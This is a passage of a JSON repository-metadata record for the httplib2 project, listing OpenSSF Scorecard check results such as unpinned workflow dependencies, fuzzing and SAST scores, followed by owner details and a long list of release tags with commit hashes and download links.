patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0